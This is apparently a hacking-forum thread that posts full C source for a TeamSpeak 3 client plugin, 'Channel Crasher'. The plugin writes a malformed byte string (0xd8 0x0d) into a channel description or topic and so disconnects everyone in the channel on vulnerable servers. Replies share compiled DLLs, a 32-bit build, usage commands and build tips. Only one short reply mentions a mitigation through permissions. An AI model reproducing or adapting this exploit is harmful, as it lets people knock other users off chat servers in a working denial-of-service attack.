Channel exploit disconnect everyone :D (simple one click plugin) [till server 3.0.11.3]

ehthe

Retired Staff
Contributor
Apr 26, 2015
1,029
897
216
Some people were a bit bitter with me last time about open-source :p
Code:
#include <stdlib.h>
#include <string.h>
#include <assert.h>
#include "public_definitions.h"
#include "ts3_functions.h"
#include "plugin.h"

static struct TS3Functions ts3Functions;

#define _strcpy(dest, destSize, src) { strncpy(dest, src, destSize-1); (dest)[destSize-1] = '\0'; }

#define PLUGIN_API_VERSION 20

static char* pluginID = NULL;

/*********************************** Required functions ************************************/

const char* ts3plugin_name() {
    return "Channel Crasher";
}

const char* ts3plugin_version() {
    return "0.1";
}

int ts3plugin_apiVersion() {
    return PLUGIN_API_VERSION;
}

const char* ts3plugin_author() {
    return "ehthe for r4p3.net";
}

const char* ts3plugin_description() {
    return "This plugin allows you to disconnect people :D";
}

/* Set TeamSpeak 3 callback functions */
void ts3plugin_setFunctionPointers(const struct TS3Functions funcs) {
    ts3Functions = funcs;
}

/*
 * Custom code called right after loading the plugin. Returns 0 on success, 1 on failure.
 * If the function returns 1 on failure, the plugin will be unloaded again.
 */
int ts3plugin_init() {
    return 0;
}

/* Custom code called right before the plugin is unloaded */
void ts3plugin_shutdown() {
    /* Free pluginID if we registered it */
    if(pluginID) {
        free(pluginID);
        pluginID = NULL;
    }
}

/****************************** Optional functions ********************************/

/*
 * If the plugin wants to use error return codes, plugin commands, hotkeys or menu items, it needs to register a command ID. This function will be
 * automatically called after the plugin was initialized. This function is optional. If you don't use these features, this function can be omitted.
 * Note the passed pluginID parameter is no longer valid after calling this function, so you must copy it and store it in the plugin.
 */
void ts3plugin_registerPluginID(const char* id) {
    const size_t sz = strlen(id) + 1;
    pluginID = (char*)malloc(sz * sizeof(char));
    _strcpy(pluginID, sz, id);  /* The id buffer will invalidate after exiting this function */
}

void ts3plugin_freeMemory(void* data) {
    free(data);
}

/* Helper function to create a menu item */
static struct PluginMenuItem* createMenuItem(enum PluginMenuType type, int id, const char* text, const char* icon) {
    struct PluginMenuItem* menuItem = (struct PluginMenuItem*)malloc(sizeof(struct PluginMenuItem));
    menuItem->type = type;
    menuItem->id = id;
    _strcpy(menuItem->text, PLUGIN_MENU_BUFSZ, text);
    _strcpy(menuItem->icon, PLUGIN_MENU_BUFSZ, icon);
    return menuItem;
}

/* Some makros to make the code to create menu items a bit more readable */
#define BEGIN_CREATE_MENUS(x) const size_t sz = x + 1; size_t n = 0; *menuItems = (struct PluginMenuItem**)malloc(sizeof(struct PluginMenuItem*) * sz);
#define CREATE_MENU_ITEM(a, b, c, d) (*menuItems)[n++] = createMenuItem(a, b, c, d);
#define END_CREATE_MENUS (*menuItems)[n++] = NULL; assert(n == sz);

/*
 * Menu IDs for this plugin. Pass these IDs when creating a menuitem to the TS3 client. When the menu item is triggered,
 * ts3plugin_onMenuItemEvent will be called passing the menu ID of the triggered menu item.
 * These IDs are freely choosable by the plugin author. It's not really needed to use an enum, it just looks prettier.
 */
enum {
    MENU_ID_GLOBAL_1 = 1,
    MENU_ID_GLOBAL_2,
    MENU_ID_CHANNEL_1,
    MENU_ID_CHANNEL_2,
};

/*
 * Initialize plugin menus.
 * This function is called after ts3plugin_init and ts3plugin_registerPluginID. A pluginID is required for plugin menus to work.
 * Both ts3plugin_registerPluginID and ts3plugin_freeMemory must be implemented to use menus.
 * If plugin menus are not used by a plugin, do not implement this function or return NULL.
 */
void ts3plugin_initMenus(struct PluginMenuItem*** menuItems, char** menuIcon) {
    BEGIN_CREATE_MENUS(4);
    CREATE_MENU_ITEM(PLUGIN_MENU_TYPE_GLOBAL, MENU_ID_GLOBAL_1, "create channel | Description", "");
    CREATE_MENU_ITEM(PLUGIN_MENU_TYPE_GLOBAL, MENU_ID_GLOBAL_2, "create channel | Topic (disconnect everyone)", "");
    CREATE_MENU_ITEM(PLUGIN_MENU_TYPE_CHANNEL, MENU_ID_CHANNEL_1, "Edit description", "");
    CREATE_MENU_ITEM(PLUGIN_MENU_TYPE_CHANNEL, MENU_ID_CHANNEL_2, "Edit topic (disconnect everyone)", "");
    END_CREATE_MENUS;

    /*
     * Specify an optional icon for the plugin. This icon is used for the plugins submenu within context and main menus
     * If unused, set menuIcon to NULL
     */
    *menuIcon = (char*)malloc(PLUGIN_MENU_BUFSZ * sizeof(char));
    _strcpy(*menuIcon, PLUGIN_MENU_BUFSZ, "");
}


void ts3plugin_onMenuItemEvent(uint64 serverConnectionHandlerID, enum PluginMenuType type, int menuItemID, uint64 selectedItemID) {
    static const unsigned char crashString[3] = {0xd8, 0x0d, 0x00};
    if (type == PLUGIN_MENU_TYPE_GLOBAL) {
        if(menuItemID == MENU_ID_GLOBAL_1) {
            ts3Functions.setChannelVariableAsString(serverConnectionHandlerID, 0, CHANNEL_NAME, "r4p3.net");
            ts3Functions.setChannelVariableAsString(serverConnectionHandlerID, 0, CHANNEL_DESCRIPTION, (const char *)crashString);
            ts3Functions.flushChannelCreation(serverConnectionHandlerID, 0, NULL);
        }
        else if(menuItemID == MENU_ID_GLOBAL_2) {
            ts3Functions.setChannelVariableAsString(serverConnectionHandlerID, 0, CHANNEL_NAME, "r4p3.net");
            ts3Functions.setChannelVariableAsString(serverConnectionHandlerID, 0, CHANNEL_TOPIC, (const char *)crashString);
            ts3Functions.flushChannelCreation(serverConnectionHandlerID, 0, NULL);
        }
    }
    else if(type == PLUGIN_MENU_TYPE_CHANNEL) {
        if(menuItemID == MENU_ID_CHANNEL_1) {
            ts3Functions.setChannelVariableAsString(serverConnectionHandlerID, selectedItemID, CHANNEL_DESCRIPTION, (const char *)crashString);
            ts3Functions.flushChannelUpdates(serverConnectionHandlerID, selectedItemID, NULL);
        }
        else if (menuItemID == MENU_ID_CHANNEL_2) {
            ts3Functions.setChannelVariableAsString(serverConnectionHandlerID, selectedItemID, CHANNEL_TOPIC, (const char *)crashString);
            ts3Functions.flushChannelUpdates(serverConnectionHandlerID, selectedItemID, NULL);
        }
    }
}
WARNING : You'll disconnect too if you're > 3.0.16 (But you'll still be able to make the others disconnect nonetheless)

Compiled binaries : https://r4p3.net/threads/channel-ex...ck-plugin-till-server-3-0-11-3.464/#post-2790
 
Last edited:

Derp

Retired Staff
Contributor
Apr 30, 2015
933
1,017
217
I made a 32bit version :)

Keyword: c
Command: crash
Usage: /c crash
Source: Click
VirusTotal: Click

Credits:

Rayger_X - Discovering the Vulnerability
ehthe - C++ CrashString

... and everyone else that helped :)
Note
The plugin will try to edit the current channel's description so make sure b_channel_modify_description is set​
 

Attachments

  • ConvertCrasher.dll
    31 KB · Views: 56
Last edited:

dotface

Member
Sep 12, 2015
21
13
38
Are there any requirements or can I do this as a Server Admin - or do I need Query?
 

ehthe

Retired Staff
Contributor
Apr 26, 2015
1,029
897
216
You just need the permission to edit the channel description/topic :) (I've seen some instance where it doesn't work and output convert error to the client)
 
Last edited:

Supervisor

Administrator
Apr 27, 2015
1,865
2,542
295
eda0ead23e.png

@Derp
Could you fix this please? Would be awesome :D
 

ehthe

Retired Staff
Contributor
Apr 26, 2015
1,029
897
216
You can compile my source like any other plugin, just sayin :)
 

Bluscream

Retired Staff
Contributor
May 8, 2015
969
936
171
If the other one doesn't work.
 

Attachments

  • ChannelCrasherCMD_x64.dll
    10.5 KB · Views: 119
  • ChannelCrasherMenu_x64.dll
    9 KB · Views: 125
  • ChannelCrasherMenu_x86.dll
    7.5 KB · Views: 60
  • ChannelCrasherCMD_x86.dll
    9 KB · Views: 53

Derp

Retired Staff
Contributor
Apr 30, 2015
933
1,017
217
You can compile my source like any other plugin, just sayin :)
Well, the problem is that the source you provided was based on the test plugin, so it contained unnecessary code, that's why I created a clean version of it.


eda0ead23e.png

@Derp
Could you fix this please? Would be awesome :D
I have no clue what's wrong,

I tested it on my 32bit machine and it worked

Compiled using VC++ 2010 Express
 

ehthe

Retired Staff
Contributor
Apr 26, 2015
1,029
897
216
Well, the problem is that the source you provided was based on the test plugin, so it contained unnecessary code, that's why I created a clean version of it.
I've removed everything that is not needed oO
 

Derp

Retired Staff
Contributor
Apr 30, 2015
933
1,017
217
I've removed everything that is not needed oO
I was talking about all the comments and the Plugin Menu functions

btw , I've always hated the plugin menu stuff, because, for some reason I can't get it to work with multiple plugins I use (like TeamSpeak Move Plugin ecc)
 

denka

Restricted
Apr 26, 2015
224
62
66
Seems to be working and is it possible to block this from happening on my server or just with teamspeak update?
 

Bluscream

Retired Staff
Contributor
May 8, 2015
969
936
171
Seems to be working and is it possible to block this from happening on my server or just with teamspeak update?
For your Guest server group you should deny the use of channel topic/description.
 
Top